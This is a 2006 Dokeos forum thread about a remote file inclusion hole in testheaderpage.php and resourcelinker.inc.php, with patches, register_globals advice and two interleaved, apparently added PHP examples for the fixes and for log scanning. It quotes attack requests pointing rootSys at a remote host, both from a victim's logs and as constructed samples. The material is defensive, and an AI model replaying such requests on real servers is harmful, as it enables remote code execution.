vianney
Joined: 09 Feb 2006 Posts: 13
Posted: Wed Apr 05, 2006 6:45 pm Post subject: [Fixed Dokeos 1.6.4] is it a security problem ?

Is there a known security vulnerability with
/claroline/exercice/testheaderpage.php?rootSys ?
My server has been hacked using this URL
/claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&c etc.
on Dokeos 1.6.2
Thank you for your help.

pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
Posted: Wed Apr 05, 2006 7:21 pm

This is indeed a security hole. You can expect a new dokeos version tomorrow.
If you want to fix this already you have to do the following:
- open inc/claro_init_global.inc.php
- find the 4 occurrences of
    if(!isset($_SESSION[$key]) && $key != 'includePath')
- replace these 4 occurrences with
    if(!isset($_SESSION[$key]) && $key != 'includePath'
        && $key != 'rootSys' && $key != 'clarolineRepositorySys'
        && $key != 'lang_path' && $key != 'extAuthSource'
        && $key != 'thisAuthSource' && $key != 'main_configuration_file_path'
        && $key != 'phpDigIncCn' && $key != 'drs')
_________________
Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be

vianney
Joined: 09 Feb 2006 Posts: 13
Posted: Wed Apr 05, 2006 7:31 pm

thank you very much

pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
Posted: Wed Apr 05, 2006 7:36 pm

an alternative solution (but equally good and maybe easier to implement) (although I prefer the first solution)
add somewhere on the top of the page of claro_init_global.inc.php (solution by Olivier and René)
    foreach (array('includePath', 'rootSys', 'clarolineRepositorySys') as $dontfake)
    {
        unset($_GET[$dontfake], $HTTP_GET_VARS[$dontfake], $_POST[$dontfake], $HTTP_POST_VARS[$dontfake]);
    }
_________________
Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be

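The two fixes pcool posted, modelled in one stand-alone PHP script so the difference between "exclude the key in the import test" and "strip the key from the request first" can be seen on a concrete request. This is an added example, not Dokeos code and not code from the thread: the import loop, the configuration values, the request contents and the placeholder library path are all assumptions made to keep the script self-contained, and nothing is ever actually included.

```php
<?php
// Added example, not code from Dokeos or from this thread. The loop below is
// only an emulation of the register_globals-style import that the posted
// fixes patch; the real claro_init_global.inc.php is not reproduced.

// Keys that must never be taken from the request (the list pcool posted).
const PROTECTED_KEYS = [
    'includePath', 'rootSys', 'clarolineRepositorySys', 'lang_path',
    'extAuthSource', 'thisAuthSource', 'main_configuration_file_path',
    'phpDigIncCn', 'drs',
];

// Constructed configuration values, standing in for what the config file sets.
function loadConfig(): array
{
    return [
        'rootSys'                => '/var/www/dokeos/',
        'clarolineRepositorySys' => '/var/www/dokeos/claroline/',
        'includePath'            => '/var/www/dokeos/claroline/inc/',
    ];
}

// Emulated import: copy request variables into the script's scope unless the
// session already holds them, skipping only the keys in $excluded. With just
// 'includePath' excluded (the original test), any other configuration
// variable, rootSys included, can be replaced by a query-string value.
function importRequest(array $request, array $session, array $scope, array $excluded): array
{
    foreach ($request as $key => $value) {
        if (!isset($session[$key]) && !in_array($key, $excluded, true)) {
            $scope[$key] = $value;
        }
    }
    return $scope;
}

// The second fix from the thread: drop protected keys from the request
// arrays before anything else reads them.
function stripProtectedKeys(array $request, array $protected): array
{
    foreach ($protected as $dontfake) {
        unset($request[$dontfake]);
    }
    return $request;
}

// Where the value ends up: a path that would be handed to require(). It is
// only built here, never included, so the script is safe to run.
function libraryPath(array $scope): string
{
    return $scope['rootSys'] . 'claroline/inc/lib/placeholder.lib.php'; // placeholder file name
}

// Defender check for the setting discussed later in the thread. ini_get()
// returns false on PHP >= 5.4, where register_globals no longer exists.
function registerGlobalsIsOn(): bool
{
    return filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed request shaped like the one in the first post; the host is a
// placeholder, not the one from the thread.
$request = ['rootSys' => 'http://attacker.invalid/x.gif?', 'cidReq' => 'COURSE01'];
$session = [];          // first request of a visit: nothing in the session yet
$config  = loadConfig();

$vulnerable = importRequest($request, $session, $config, ['includePath']);
$fixed1     = importRequest($request, $session, $config, PROTECTED_KEYS);
$fixed2     = importRequest(stripProtectedKeys($request, PROTECTED_KEYS), $session, $config, ['includePath']);

printf("vulnerable: require %s\n", libraryPath($vulnerable));
printf("fix 1:      require %s\n", libraryPath($fixed1));
printf("fix 2:      require %s\n", libraryPath($fixed2));
printf("cidReq still imported after fix 1: %s\n", $fixed1['cidReq']);
printf("register_globals on: %s\n", registerGlobalsIsOn() ? 'yes' : 'no');
```

Both fixes leave ordinary parameters such as cidReq untouched and keep rootSys at its configured value. Neither can undo PHP's own register_globals, which populates $rootSys from the query string before any application code runs; that is why the thread ends with the advice to set it to off.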
domifreitas
Joined: 18 Oct 2004 Posts: 650 Location: Portugal
Posted: Thu Apr 06, 2006 9:18 am

Should we do the same upgrade for Dokeos community release 2.0.2?

turboke
Joined: 21 Feb 2005 Posts: 851 Location: Hogeschool Gent, Belgium
Posted: Thu Apr 06, 2006 10:46 am

domifreitas wrote:
    Should we do the same upgrade for Dokeos community release 2.0.2?
You should. The patch will be included in CR 2.0.3 (see this post).

roan
Joined: 11 Dec 2002 Posts: 2543 Location: Free University of Brussels, Belgium
Posted: Thu Apr 06, 2006 11:43 am

turboke wrote:
    domifreitas wrote:
        Should we do the same upgrade for Dokeos community release 2.0.2?
    You should. The patch will be included in CR 2.0.3 (see this post).
Community release 2.0.3 with the security fix is ready now.
Update: more security fixes available in the new community release 2.0.4.
_________________
Free software for freedom!
Last edited by roan on Thu Apr 13, 2006 10:53 am; edited 1 time in total

vianney
Joined: 09 Feb 2006 Posts: 13
Posted: Thu Apr 06, 2006 2:48 pm

pcool wrote:
    This is indeed a security hole. You can expect a new dokeos version tomorrow.
    If you want to fix this already you have to do the following:
    - open inc/claro_init_global.inc.php
    - find the 4 occurrences of
        if(!isset($_SESSION[$key]) && $key != 'includePath')
    - replace these 4 occurrences with
        if(!isset($_SESSION[$key]) && $key != 'includePath'
            && $key != 'rootSys' && $key != 'clarolineRepositorySys'
            && $key != 'lang_path' && $key != 'extAuthSource'
            && $key != 'thisAuthSource' && $key != 'main_configuration_file_path'
            && $key != 'phpDigIncCn' && $key != 'drs')
Are you sure this is enough? I applied this code yesterday, like this. But my server was hacked for the second time today, in the same way:
[06/Apr/2006:14:52:59 +0200] "GET /claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&cmd=cd...
etc.

pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
Posted: Thu Apr 06, 2006 2:54 pm

Can you post your claro_init_global.inc.php here so that we can verify whether you applied the fix correctly?
_________________
Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be

vianney
Joined: 09 Feb 2006 Posts: 13
Posted: Thu Apr 06, 2006 3:07 pm

here it is :
Last edited by vianney on Thu Apr 06, 2006 3:45 pm; edited 1 time in total

pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
Posted: Thu Apr 06, 2006 3:45 pm

your server probably has register_globals=on in php.ini
This should be set to off.
You can also use the second approach in this case. Add to the top of claro_init_global.inc.php:
    foreach (array('includePath', 'rootSys', 'clarolineRepositorySys') as $dontfake)
    {
        unset($_GET[$dontfake], $HTTP_GET_VARS[$dontfake], $_POST[$dontfake], $HTTP_POST_VARS[$dontfake]);
    }
_________________
Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be

vianney
Joined: 09 Feb 2006 Posts: 13
Posted: Thu Apr 06, 2006 5:31 pm

I will try.
Actually, register_globals is on.
Is "off" a "should" or a "must" for Dokeos? I thought it was "should".
Actually the 3rd hack, they like me :-(
it is quite different:
[06/Apr/2006:17:18:50 +0200] "GET /claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http://www.mptechno.cz/cse.gif?&c
etc
Is the new code OK for that too?

Tripple
Joined: 29 Nov 2004 Posts: 395
Posted: Thu Apr 06, 2006 7:51 pm

I added the fix on my Dokeos 1.6.1 installation.
How do I know if I was hacked? Do I have to search my logfile for 'rootSys'?

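One way to answer the log-file question above: a small PHP script that scans Apache access-log lines for requests that try to set any of the protected configuration variables from the query string, and marks those whose value is a URL, the pattern in the log lines quoted in this thread. This is an added example, not code from the thread or from Dokeos; the sample log lines are constructed (client addresses and the remote host are placeholders, not indicators), and the parameter list is the one from pcool's fix.

```php
<?php
// Added example, not code from this thread or from Dokeos: flag requests
// that carry Dokeos configuration variables in the query string.

// Parameters that never belong in a request (the list from pcool's fix).
const WATCHED_PARAMS = [
    'rootSys', 'clarolineRepositorySys', 'includePath', 'lang_path',
    'extAuthSource', 'thisAuthSource', 'main_configuration_file_path',
    'phpDigIncCn', 'drs',
];

// Returns null for lines that are not interesting, otherwise a finding.
function analyseLogLine(string $line): ?array
{
    // Timestamp, request target and status from a common/combined log line.
    if (!preg_match('/\[([^\]]+)\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    [, $timestamp, $target, $status] = $m;
    $pos = strpos($target, '?');
    if ($pos === false) {
        return null;                       // no query string at all
    }
    parse_str(substr($target, $pos + 1), $params);

    $hits = [];
    foreach (WATCHED_PARAMS as $name) {
        if (!array_key_exists($name, $params)) {
            continue;
        }
        $value = is_string($params[$name]) ? $params[$name] : '';
        // A URL as the value is a remote-include attempt; any other value is
        // still an attempt to override a variable the request must not set.
        $hits[$name] = preg_match('#^[a-z][a-z0-9+.-]*://#i', $value) ? 'remote include' : 'override';
    }
    if ($hits === []) {
        return null;
    }
    return [
        'time'   => $timestamp,
        'path'   => substr($target, 0, $pos),
        'status' => (int) $status,     // a 200 here deserves more attention than a 404
        'hits'   => $hits,
    ];
}

// Scan every line; the line number is kept so the finding can be looked up.
function scanLog(iterable $lines): array
{
    $findings = [];
    foreach ($lines as $n => $line) {
        $finding = analyseLogLine($line);
        if ($finding !== null) {
            $finding['line'] = $n + 1;
            $findings[] = $finding;
        }
    }
    return $findings;
}

// Constructed log lines modelled on the ones quoted in this thread; the
// addresses and the host are placeholders.
$sampleLog = [
    '203.0.113.10 - - [06/Apr/2006:14:52:59 +0200] "GET /claroline/exercice/testheaderpage.php?rootSys=http://attacker.invalid/cse.gif?&c=1 HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [06/Apr/2006:15:01:12 +0200] "GET /claroline/exercice/exercise.php?cidReq=COURSE01&exerciseId=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [06/Apr/2006:17:18:50 +0200] "GET /claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http://attacker.invalid/cse.gif?&c=1 HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
];

foreach (scanLog($sampleLog) as $f) {
    foreach ($f['hits'] as $param => $kind) {
        printf("line %d %s %s status=%d %s: %s\n",
            $f['line'], $f['time'], $f['path'], $f['status'], $param, $kind);
    }
}
// On a real server: scanLog(file('/var/log/apache2/access.log', FILE_IGNORE_NEW_LINES))
```

The first and third sample lines are reported, the ordinary exercise request is not. Matching on the parameter name rather than on a particular remote host keeps the check useful when the attacker's URL changes, and a hit with status 200 on a page that should never see such a parameter is the one to investigate first.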
roan
Joined: 11 Dec 2002 Posts: 2543 Location: Free University of Brussels, Belgium
Posted: Thu Apr 06, 2006 9:57 pm

vianney wrote:
    I will try.
    Actually, register_globals is on.
    Is "off" a "should" or a "must" for Dokeos? I thought it was "should".
Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.
_________________
Free software for freedom!

Tripple
Joined: 29 Nov 2004 Posts: 395
Posted: Thu Apr 06, 2006 10:03 pm

roan wrote:
    Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.
Does Dokeos 1.6.1 work with globals off?

roan
Joined: 11 Dec 2002 Posts: 2543 Location: Free University of Brussels, Belgium
Posted: Thu Apr 06, 2006 10:17 pm

Tripple wrote:
    roan wrote:
        Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.
    Does Dokeos 1.6.1 work with globals off?
Yes, from Dokeos 1.6.0 and community release 2.0 upwards Dokeos works with register_globals off. I can't remember about Dokeos 1.5.x but those users should upgrade anyway ;-)
However we performed a small trick to make this happen, which caused this security problem. In the next major releases (community release 2.1 and plain Dokeos 1.8) this trick is going to be removed to make Dokeos more secure.
_________________
Free software for freedom!

vianney
Joined: 09 Feb 2006 Posts: 13
Posted: Fri Apr 07, 2006 7:35 am

roan wrote:
    Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.
in the INSTALL file it is said that:
    Past Dokeos versions required register_globals to be set to On. This is no
    longer necessary, this can be set to Off and Dokeos will work fine.
But as I can see from my experience it can't be used with register_globals "On" because there is a major security hole when it is used in production this way.
Dokeos should say so clearly.
Secondly, I can tell you that the two versions of the code you proposed against the hole presented in this post are inactive when register_globals is On.

pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
Posted: Fri Apr 07, 2006 8:15 am

When register globals is set to on then the only hole that still exists is in resourcelinker.inc.php.
Dokeos 1.6.4 zip package has the corrected resourcelinker.inc.php file already (tar.gz doesn't yet).
I noticed today that not all my fixes made it to the CVS (I have lost all my icons on my windows box so I could not see if the files were changed or not)
What I advise you is
1. set register_globals to OFF
2. take the dokeos1.6.4 ZIP package and use this one to update your campus.
_________________
Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be

frmartens
Joined: 20 Sep 2004 Posts: 441 Location: Ghent Arteveldehogeschool
Posted: Fri Apr 07, 2006 8:23 am

pcool wrote:
    Dokeos 1.6.4 zip package has the corrected resourcelinker.inc.php file already (tar.gz doesn't yet).
Is this possible? Both files should be created on the same CVS tag.
I'm also wondering: is the zip file only intended to be installed on a windows server or is it just another means of packaging it?
_________________
Frederik Martens - Project Digitaal Leren - Arteveldehogeschool

pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
Posted: Fri Apr 07, 2006 9:03 am

It's just a means of packaging.
I manually added the corrected files to the zip file but couldn't do this for the tar.gz
_________________
Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be